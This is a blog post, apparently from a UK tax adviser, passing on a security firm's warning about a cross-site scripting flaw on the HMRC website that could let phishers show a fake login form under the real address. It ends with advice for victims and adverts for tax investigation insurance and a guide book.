My thanks to a loyal reader who sent me a link to an article about a potential security flaw within the HMRC website, that may allow phishers to harvest personal information from the unwary user.
Here is a summary of the issue from Concept Business Systems (who also put together the video above):
A potentially dangerous cross site scripting vulnerability has been discovered on Her Majesty's Customs & Excise web site.
This exploit allows anyone to alter content shown on the HMRC.gov.uk search site.
As we've shown below, it's possible to change any part of the site. If exploited, a fraudster could potentially gain access to user accounts by forwarding a malicious link by email, web forum or chat message. HMRC are a prime target for phishing scams, but success rates are limited for a number of reasons. The main problem fraudsters face is trying to convince their victims that the site (and email) is genuine. Quite often, it's simple grammatical / spelling mistakes which give the game away. Unfortunately, some scams are very well executed and can fool even the most careful users.
All phishing scams are dangerous, but this is no ordinary phishing scam and it stands out for a two reasons.
1. It's a very high profile site.
2. The fraudster no longer needs to clone the site, these changes can be made to the genuine site... thus hiding the scam behind the correct URL (www.hmrc.gov.uk) and giving the user a false sense of security.
In the video below, we've altered the content and replaced it with a message asking the user to login in order to perform a tailored search. This message and the form beneath are fake; created purely to collect your username & password. These details are not sent to HMRC's server and are therefore not covered by their SSL certificate (the padlock symbol). Instead, they are forwarded to an address of the hackers choice.
With phishing scams & identity theft a real cause for concern, this needs to be resolved as a matter of urgency.
If you suspect you've been a victim of such a scam, it's absolutely vital that you change your password as soon as possible, particularly if you're an agent acting on behalf of other clients.
DO NOT disclose any personal details in your email... simply outline the type of information you disclosed and to whom.
Tax does have to be taxing.
Professional Cover Against the Threat of Costly TAX and VAT Investigations
What is TAXWISE?
TAXWISE is a tax-fee protection service that will pay up to £75,000 towards your accountant's fees in the event of an HM Revenue & Customs full enquiry or dispute.
To find out more, please use this link Taxwise
Tax Investigation for Dummies, by Nick Morgan, provides a good and easy to read guide for anyone caught up in an HMRC tax investigation. A must read for any Self Assessment taxpayer.
Click the link to read about: Tax Investigation for Dummies